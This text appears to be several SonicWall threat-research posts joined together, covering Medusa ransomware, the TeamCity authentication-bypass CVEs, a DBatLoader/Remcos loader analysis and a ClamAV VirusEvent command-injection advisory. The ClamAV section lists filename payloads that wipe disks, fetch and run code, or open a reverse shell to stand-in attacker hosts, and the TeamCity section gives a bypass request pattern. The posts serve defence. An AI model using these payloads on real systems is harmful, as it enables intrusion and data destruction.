Overview

The SonicWall Capture Labs threat research team has been tracking ransomware that has gained recent notoriety known as Medusa. Medusa surfaced as a Ransomware-as-a-Service (RaaS) platform in late 2022. The group behind Medusa predominantly propagates this malware through unpatched vulnerabilities and directs their attacks on various industry sectors such as technology, education, manufacturing, healthcare and retail. Most attacks have occurred in the United States, but other countries such as the U.K., France, Italy, Spain and India have been affected by this ransomware over the last year. The copy of Medusa we obtained was aimed at the Glendale Unified School District in California. It is reported that the attackers demanded $1M in Bitcoin for file retrieval and deletion of exfiltrated student data. Glendale is not the only school district to be targeted. Hinsdale School District in New Hampshire, and the Campbell County Schools in Kentucky are also reported to have been recently hit by Medusa ransomware.

Infection Cycle

As is typical with ransomware, files are immediately encrypted at runtime. They are marked with a .MEDUSA file extension. During encryption, a file named READ_ME_MEDUSA!!!.txt is dropped into the corresponding directories:

READ_ME_MEDUSA!!!.txt contains the following message:

We tried accessing the tOr link using tOr browser, but the site was not fully functional:

Running the malware normally yields no text output.  However, running it within our reverse engineering analysis engine allowed us to view its internal PowerShell script running in real-time as it performed various malicious operations:

Spying on API calls used by the malware during its operation allows us to inspect its behavior in real-time. There are 44 applications that it attempts to kill if running:

There are 184 services that it tries to stop. These include various antivirus services, databases, backup services, email servers etc.

It also stops shadow copies, using the vssadmin application:

We tried reaching out to the Proton Mail email address provided, but it was no longer active:

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the following signature:

• GAV: Medusa.RSM_4(Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Overview

The SonicWall Capture Labs threat research team became aware of a couple of noteworthy vulnerabilities — an authentication bypass vulnerability and a path traversal vulnerability — in JetBrains TeamCity, assessed their impact and developed mitigation measures for them. TeamCity, a build management and continuous integration server, published an advisory on these vulnerabilities which affect versions before 2023.11.4. Considering the sizeable user base as well as the low attack complexity, TeamCity users are strongly encouraged to upgrade their instances to the latest versions with utmost priority.

CVE Details

Authentication Bypass Vulnerability

The authentication bypass vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2024-27198.

The CVSS score is 9.8 based on the metrics (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Path Traversal Vulnerability

The path traversal vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2024-27199.

The CVSS score is 7.3 based on the metrics (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L).

Technical Overview

CVE-2024-27198

This vulnerability allows threat actors to circumvent the authentication mechanism by sending a crafted request to the web server. The flaw is in the functionality of the jetbrains.buildServer.controllers.BaseController class of the web-openapi.jar library. As seen in the code shared by rapid7 in Figure 1, if a request is served by the handleRequestInternal method in the BaseController class and not redirected by issuing 302 status code, then it will lead to execution of the updateViewIfRequestHasJspParameter method.

Figure 1: handleRequestInternal method of BaseController class, source: rapid7

Another piece of code, as seen in Figure 2, defining the method updateViewIfRequestHasJspParameter reveals that the unauthenticated attacker needs to make sure that the modelAndView has a name and does not terminate with .jsp. Requesting a non-existent URI that generates a 404 response and renders a /404.html page would result in the variable isControllerRequestWithViewName becoming true and the method getJspFromRequest will be called.

Figure 2: updateViewIfRequestHasJspParameter method, source: rapid7

The method getJspFromRequest is the one that captured the imagination of the attackers as it allows them to render an arbitrary endpoint by specifying the value in a parameter named jsp, as seen in Figure 3. Although it does not only require the endpoints to terminate with .jsp but also makes sure that it does not contain the confined path /admin/, the parameters can be tricked to access the arbitrary endpoints by an unauthenticated threat actor which normally requires authentication. 

Figure 3: getJspFromRequest method, source: rapid7

CVE-2024-27199

This vulnerability allows the threat actors to gain unauthenticated access to a limited number of authenticated endpoints due to a path traversal issue present in some of the endpoints such as /res/, /update/ and /.well-known/acme-challenge/. The attacker can make use of those paths along with path traversal vectors to reach other restricted endpoints by circumventing the authentication checks.

Triggering the Vulnerability

CVE-2024-27198

Leveraging this authentication bypass vulnerability requires the attacker to meet the following requisites:

1. Render a 404 response by requesting a non-existing path, for instance, /sw
2. Set a value of jsp query parameter in the request to the desired path which requires authentication, for example, ?jsp=/app/rest/server
3. Make sure the crafted URI terminates with .jsp. The path can be ended by appending an HTTP path parameter or a query string segment such as ;.jsp or ?.jsp

The example request would look like, http[:]//sw-test[.]local:8111/sw?jsp=/app/rest/server?.jsp

Accessing the authenticated endpoint /app/rest/server by exploiting this vulnerability is demonstrated in the video below.

CVE-2024-27199

Triggering this path traversal vulnerability requires the threat actor to send a crafted request utilizing the endpoints discussed in the overview section to reach number of pages that may expose sensitive information and/or let the attacker alter system configurations. For instance, the video illustrating the unauthenticated access to some of the endpoints /app/https/settings/certificateInfo and /admin/diagnostic.jsp is shown below.

 

Exploitation

CVE-2024-27198

Exploitation of this vulnerability yields the attacker a commanding position over a TeamCity server by adding a new admin user, as seen in the video below, and complete control over builds and projects hosted on the server which can open the door for them to execute a sophisticated supply chain attack.

CVE-2024-27199

Exploitation of this vulnerability yields the attacker sensitive information as well as the ability to modify some of the server configurations such as uploading a custom HTTPS certificate and specifying the listening port for the HTTPS service using a self-signed certificate.

This flaw can be exploited by nefarious attackers to execute either a denial-of-service (DoS) attack by modifying the HTTPS listening port or a man-in-the-middle (MITM) attack, since the attacker owns the private key of the modified certificate.

 

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

CVE-2024-27198

• IPS: 15969 and 15970

CVE-2024-27198

• IPS: 15966, 15967 and 15968

Remediation Recommendations

Considering the severe consequences of this vulnerability as well as the reports of mass-generation of admin accounts using the exploit, users are strongly encouraged to upgrade their instances as published in the vendor advisory.

Relevant Links

• Rapid7 Blog
• TeamCity Advisory

Overview

Threat actors are continuously evolving their malware code to protect them against security defenses. SonicWall Capture Labs threat research team has observed that the latest variant of DBatLoader has included an old version of RogueKiller Antirootkit Driver which is used by the malware to terminate security software. The malware majorly delivers Remcos RAT, but is also known for delivering other malware. The malware is received inside an archive as an email attachment and is highly obfuscated, containing multiple layers of encryption data.

First Layer

The malware starts its execution with a call to the OpenURL API and, based on the return value, the malware initializes a string value which is used in the obfuscation code. The malware is full of obfuscated code which pretends to be an API hooking code but does not hook any API. Sometimes the obfuscated code fails by calling a Unicode argument expecting API with an ASCII value and sometimes it just modifies the API address in its own memory array. The malware also contains multiple concatenation, copy and move instructions before calling the fake API hooking module. The malware contains a GIF image which contains an encrypted second layer executable.

Figure 1: Obfuscation code

Not a True Image Steganography

In old variants, it was observed that the malware kept a GIF image in the resource data, but in the latest variant, the GIF file is kept in the file itself to avoid detection from the security software. The GIF image contains an encrypted next-layer executable which is not hidden in the pixel’s data but is actually in the additional bytes in the GIF image and does not alter the image’s visuals. The malware reads the GIF image bytes and searches for the delimiter string “< <” (0x3C 0x20 0x3C), to get a total of nine chunks of bytes separated by the delimiter.  The seventh chunk of bytes is the encrypted second-layer executable.

Figure 2: GIF Image

The decryption logic involves the addition of value 0x6B into the encrypted bytes to get the second layer executable.

Figure 3: Decryption logic in first layer executable

The malware allocates memory in the self process using the API ZwAllocateVirtualMemory to load the decrypted binary sections. The malware fixes the relocations, resolves imports and transfers control of the entry point of the second-layer executable.

Figure 4: Computes entrypoint

Second Layer

The malware starts by calling the timeSetEvent API to delay a callback function execution with 2710h milliseconds and additionally uses the argument constant TIME_ONESHOT for a one-time execution of the callback function which further continues the malicious execution. The malware checks the client’s internet status using the API InetIsOffline and, based on the return value, the malware initializes a string that is used in obfuscation code like the first layer executable.

The malware extracts the current executable name without the extension and appends “.png” to check its presence in the current directory. The checked PNG file is not available for the current variant, however, examining the code, the PNG file is expected to contain a list of URLs in plaintext. As the PNG file is not available, the malware reads the current executable file and searches for the “^^Nc” delimiter to retrieve the list of encrypted URLs and a key to decrypt URLs which is “202” in the current variants.

Figure 5: Delimiter to separate the URL list and key

The URL list is decrypted by adding the value 0x43 (202-0x10D) to the encrypted bytes. The decrypted URL list is separated by the delimiter “@^@”. The malware has structure to keep three URLs but in the current variant only one URL is available and other URLs are initialized with the values “Link2” and “Link3”.

Figure 6: First layer decryption used to decrypt URLs

The malware sequentially checks for an active URL using the API InternetCheckConnectionA from the decrypted list of URLs. Instead of using conventional APIs to download a file from a URL, the malware retrieved the COM library “winhttpcom.dll” CLSID for “WinHttp.WinHttpRequest.5.1” using the API CLSIDFromProgID and instantiates its object using the API CoCreateInstance.

Figure 7: COM library used for downloading data

Figure 8: URLs to download data

The malware now downloads data from the URL: “h[t][t]ps://nbtp1[.]sa[.]com/youtubedrivedocumentsuploadgoogledownloaduptowns/202_Pblednxqcpj” using APIs from the COM library “winhttpcom.dll”. It also checks for downloaded bytes size which should be more than 0x7530.

Figure 9: Downloaded encrypted data

Downloaded data contains multiple executable files associated with the malware along with configuration data and an additional malware payload executable which is Remcos RAT in the current variant. Before Base64 encoding, configuration data and other associated binary executables are two layers encrypted but the additional malware executable contains a total of five layers of encryption.

The first layer is decrypted using the same logic which was used to decrypt the list of URLs by adding 0x43 value into the encrypted data. The second layer decryption logic checks the encrypted byte if it is greater than 7F (0x21+0x5E) then the encrypted byte is added to 0x0E, divided by 0x5E and then added by 0x21 to get the decrypted byte:

Figure 10: Second layer decryption

The decrypted data is separated by the delimiter “*()%@5YT!@#G__T@#$%^&*()__#@$#57$#!@” which contains the following information:

• Decryption key for the additional malware
• File name used for persistence entry
• Encrypted additional malware (Remcos RAT)
• Configuration Data
• Old version of Exchange ActiveSync Invoker (easinvoker.exe) vulnerable to DLL hijacking
• Malicious netutils.dll for privileged execution
• Old version of RogueKiller Antirootkit Driver (truesight.sys) to terminate security software

Figure 11: Downloaded decrypted data

Persistence

The malware drops a self-copy into “C:\Users\Public\Libraries\Pblednxq.PIF” and creates a Windows Shortcut File (LNK) file “C:\Users\Public\Pblednxq.url” which tries to execute the dropped self-copy of the malware.

Figure 12: Windows shortcut file

The malware creates the registry entry “SOFTWARE\\Microsoft\\Windows\\CurrentVersion\Run\Pblednxq” for the current user and sets the value to the dropped LNK file path:

Figure 13: Persistence entry

Privilege Escalation

The malware drops easinvoker.exe, netutils.dll and truesignt.sys from the downloaded data into the directory “C:\Users\Public\Libraries”. The old version of Exchange ActiveSync Invoker (easinvoker.exe) is vulnerable to relative path DLL hijacking which loads malicious netutils.dll from the current directory on execution. The old version of RogueKiller Antirootkit Driver (truesight.sys) is a kernel driver file that terminates protected processes associated with the provided process ID. The malware also drops two batch files PblednxqO.bat and KDECO.bat into “C:\Users\Public\Libraries” and executes “PblednxqO.bat” using the API WinExec.

Figure 14: Obfuscated PblednxqO.bat

After de-obfuscating the batch file “PblednxqO.bat”, it becomes legible. The batch script creates the directory “C:\Windows ” which contains additional space to take advantage of mocking a trusted directory method for privilege escalation. The malware copies the files easinvoker.exe, netutils.dll and KDECO.bat from the directory “C:\Users\Public\Libraries” to directory “C:\Windows \System32” and starts privileged mode execution for the easinvoker.exe process.

Figure 15: Simplified PblednxqO.bat

The malware now deletes used files that are no longer needed from the “C:\Users\Public\Libraries” and “C:\Windows \System32” directories, leaving files that are being used for persistence and further execution.

Figure 16: Deleting used files

The batch script has already executed the easinvoker.exe process and the malware also executes the easinvoker.exe using the API WinExec as a backup plan which loads malicious netutils.dll.

Figure 17: Starts easinvoker.exe

EDR Evasion

DLLMain function in “netutils.dll” contains a fake API hooking obfuscation which invokes the API LoadLibraryW using the filename “Amsi” as an ASCII string. The LoadLibraryW API expects the Unicode string as an argument and is provided with an ASCII string which causes failure of the API. The code intended for API hooking is never executed.

Figure 18: Fake API hooking obfuscation

The malware executes “C:\Windows \System32\KDECO.bat” using the API WinExec which is obfuscated similarly as “PblednxqO.bat”.

Figure 19: Executes KDECO.bat

After obfuscating, the batch script becomes legible. The batch script executes a PowerShell cmdlet to exclude the directory “C:\Users” from Windows Defender’s scanning. The batch script also registers and starts “C:\Users\Public\Libraries\truesight.sys” as a kernel mode driver.

Figure 20: Simplified KDECO.bat

The malware contains list of 49 security software processes which are checked against the running processes to retrieve the process ID.

Figure 21: 49 security processes

The retrieved process ID is sent to the driver component which terminates the associated running process.

Figure 22: Sends process ID to the kernel driver

TrueSight RogueKiller Antirootkit Driver

The driver component truesight.sys file with version 3.3.0 used by the malware belongs to RogueKiller AntiMalware software by Adlice Software. The kernel driver terminates protected processes associated with the process ID sent by the netutils.dll binary. Truesight.sys version 3.4 is fixed to avoid killing protected processes.

Process Injection

Even after two layers of decryption for the downloaded data, the Remcos RAT payload executable is still encrypted. For the next layer of decryption, the malware retrieves key bytes from the downloaded data. The decryption involves XOR operations with encrypted byte, encrypted bytes size, key byte and key bytes size to get the next level of decrypted bytes which are then reversed.  The reversed bytes are decrypted using the same decryption logic, which was used to decrypt the downloaded data to finally get the Remcos RAT executable.

Figure 23: third layer decryption used to decrypt payload

The malware has a list of file names to inject the final payload executable. The malware selects one file from the list and checks its presence in “c:\windows\system32” to start the process. If the file is not found, then the malware has a backup file name “iexpress.exe” to start as a process.

• SndVol.exe
• colorcpl.exe
• wusa.exe

Figure 24: List of processes to inject payload

The malware starts the process “C:\Windows\System32\colorcpl.exe” for the current execution and enumerates the running processes using APIs CreateToolhelp32Snapshot, Process32First and Process32Next to get the handle for the process name “colorcpl.exe”.

Figure 25: Executes colorcpl.exe

Figure 26: Enumerates running processes to get colorcpl.exe

The malware loads the decrypted Remcos RAT executable into the memory and writes the memory into “colorcpl.exe” using the API NtWriteVirtualMemory. It then starts a thread at the entry point using the API RtlCreateUserThread.

Figure 27: Write process memory

Figure 28: Starts thread in injected process

SonicWall Capture Labs Threat Research Team became aware of the ClamAV VirusEvent command injection vulnerability (CVE-2024-20328), assessed its impact, and developed mitigation measures for the vulnerability.

ClamAV is a notable, open-source anti-virus engine, widely recognized for its comprehensive suite of security solutions. It offers an array of features, including web and email scanning capabilities, endpoint security, a multi-threaded daemon, command line scanning tools, and an automatic database update service. The software boasts extensive support for various file formats, including zip, PE, rar, dmg, tar, GZIP, Bzip2, OLE2, MS Office and pdf, among others. This broad compatibility ensures that ClamAV can effectively scan and detect potential threats across a wide range of documents and files, providing robust protection against malware and viruses.

Recently, a significant security concern has emerged with the discovery of a command injection vulnerability within ClamAV. This flaw arises from the software’s mishandling of input intended for the generation of command strings. By exploiting this vulnerability, a remote attacker can orchestrate an attack by dispatching a malicious file or email to a system protected by ClamAV. If the tainted content is scanned by the compromised software, the attacker could achieve arbitrary code execution, operating under the privileges of the user running the “clamd” service. This exposes the affected systems to potential unauthorized access and control, underlining the critical need for immediate remediation and updates to safeguard against such vulnerabilities.

Product Versions Impacted

• ClamAV 0.104 (all minor updates)
• ClamAV 0.105 (all minor updates)
• ClamAV 1.0.0 through 1.0.4 (LTS)
• ClamAV 1.1 (all minor updates)
• ClamAV 1.2.0
• ClamAV 1.2.1

CVE Details

This security issue has been formally acknowledged and indexed in the Common Vulnerabilities and Exposures (CVE) system as CVE-2024-20328.

Due to its association with significant vulnerabilities in ClamAV, CVE-2024-20328 was given an overall CVSS score of 7.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L/E:U/RL:O/RC:C), indicating a high level of severity. This score is derived from a base score of 8.3, reflecting the vulnerability’s critical aspects and its implications for security. The detailed metrics reveal that the attack vector is via network, allowing potential exploitation from remote locations. The low attack complexity indicates that attackers can exploit the vulnerability with minimal effort, without requiring any privileges or user interaction, thereby widening the scope of potential attackers. The change in scope signifies that the impact of the vulnerability extends beyond the initially compromised component. Its impacts on data confidentiality, integrity and availability are all assessed as low, suggesting that while exploitation could compromise data or service, it does not lead to total loss or exposure of data.

The temporal score of 7.2 factors in the current status of the vulnerability’s exploit code maturity as unproven, indicating that there might not yet be any known exploits in the wild or that exploitation is not straightforward. The official fix at the remediation level points to the availability of patches or updates to mitigate the vulnerability, while the confirmed report confidence confirms the reliability of the reported vulnerability details.

Technical Overview

On January 2, 2024, a significant vulnerability was discovered within ClamAV, the widely utilized open-source antivirus engine. This vulnerability, arising from a command injection flaw in the VirusEvent feature of ClamAV, allows for the execution of arbitrary code on systems employing ClamAV for scanning purposes, particularly in environments like mail servers. The issue originates from the handling of crafted filenames, which, when scanned and identified as malicious by ClamAV, can trigger the execution of unauthorized commands on the system running the ClamAV daemon (clamd), all without necessitating any user interaction. This vulnerability thus presents a severe security risk, as it enables remote attackers to compromise the affected systems discreetly.

The core of the vulnerability lies in the VirusEvent feature’s functionality (See Figure 1), which is designed to execute a specified command upon the detection of a virus, using a format that incorporates placeholders for the virus name (“%v”) and the filename (“%f”). However, the critical oversight is the lack of sanitization for the filename input, permitting attackers to embed malicious commands within the filenames. These commands are then executed with the privileges of the user running clamd, as demonstrated in the clamd_others.c file’s virusaction function. This function, intended to facilitate the VirusEvent operation, constructs an environment where the PATH is set, along with variables for the filename and virus name, before dynamically building and executing a command string that includes the unsanitized filename, leading directly to the vulnerability.

Figure 1 – VirusEvent logic

Exploitation of this vulnerability can be illustrated through a configured VirusEvent in clamd.conf (See Figure 2), such as “echo VIRUS DETECTED: %v in the path %f >> /dev/stdout”. A specially crafted filename, like “# xmrig;whoami;”, can manipulate this feature to execute unintended commands, as seen in the execution output, where the command injection leads to the display of the virus detection message alongside the execution of the “whoami” command, revealing the system’s user context. This exploit underscores the imperative need for stringent input validation and the immediate application of security patches to address such vulnerabilities, safeguarding systems against potential remote attacks leveraging the ClamAV VirusEvent feature.

Figure 2 – clamd.conf entry

Triggering the Vulnerability

The ClamAV command injection vulnerability, identified in its VirusEvent feature, can be triggered under various scenarios, exploiting the lack of sanitization in the way command strings are constructed and executed. Here are four specific conditions or methods an attacker might use to exploit this vulnerability:

Embedded Commands in File Names:
Attackers might embed shell commands in file names (e.g., evilfile;rm -rf /;), which ClamAV could execute due to insufficient input sanitization in the VirusEvent feature.

Manipulating Environment Variables:
Crafted file names could manipulate environment variables to execute arbitrary commands (e.g., $(wget http://malicious.com/script.sh)), exploiting the direct passage of unsanitized command strings to a shell.

File Path Manipulation:
Attackers could include command injection payloads in file paths (e.g., /uploads/innocuous.pdf;nc -e /bin/bash attacker_ip 4444), effective in environments where ClamAV scans attacker-accessible directories.

Bypassing Command Execution Restrictions:
In restricted environments, attackers could bypass controls by crafting file names that initiate benign commands followed by malicious payloads (e.g., legitfile;curl http://malicious.com/malware -o /tmp/malware; chmod +x /tmp/malware; /tmp/malware), utilizing the VirusEvent feature for execution.

The methods above demonstrate the critical importance of validating and sanitizing all inputs in security mechanisms like ClamAV’s VirusEvent to prevent unauthorized command execution.

Exploitation

The exploitation of ClamAV’s vulnerability primarily centers on manipulating the virusaction function, especially the sequence following the vfork() system call. This function is tasked with responding to virus detection events and dynamically constructs a command string using input parameters, such as filenames and virus names, without adequately sanitizing them. The segment of code where exploitation is most critical involves the use of vfork() to spawn a new process. In the child process, identified when pid == 0, it proceeds to execute a shell command built from potentially unsafe user input via execle().

The vfork() call is crucial because it creates a new process by duplicating the address space of the calling process, allowing the child process to run in the same memory space as the parent until execle() is called. This approach is chosen for its efficiency, as it avoids the overhead of copying the entire address space of the parent process. However, the subsequent execution of a command with user-controlled input in a shell environment (/bin/sh) through execle() presents the vulnerability. The command buffer_cmd is executed in the shell without any sanitization, enabling arbitrary command execution if an attacker crafts malicious input that breaks out of the intended context.

Thus, this exploitation pathway permits attackers to run arbitrary code on systems operating ClamAV by inserting commands into filenames or other inputs processed by ClamAV, which are then included in buffer_cmd. Given that the command runs with the privileges of the ClamAV service, this vulnerability could lead to significant security incidents, including unauthorized system access, data exfiltration, or further system compromises. The specific line (See Figure 3) in the virusaction function becomes a focal point for security concerns, highlighting the critical need for strict input validation and sanitization in applications that execute commands based on external inputs.

Figure 3 – vfork() call and surrounding logic

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

• IPS: 4281 ClamAV VirusEvent Command Injection

Visualizing Security: The Threat Graph

Remediation Recommendations

The risks posed by this vulnerability can be mitigated or eliminated by:

• Applying the vendor-supplied patch to eliminate this vulnerability
• Utilizing up-to-date IPS signatures to filter network traffic
• Configuring the vulnerable product to allow access to trusted clients only
• Keeping security software and systems current for optimal defense
• Conducting regular security audits to identify and remediate potential weaknesses

Relevant Links

Vendor Advisory
NIST NVD CVE
CWE-78
NIST CVSS Calculator Score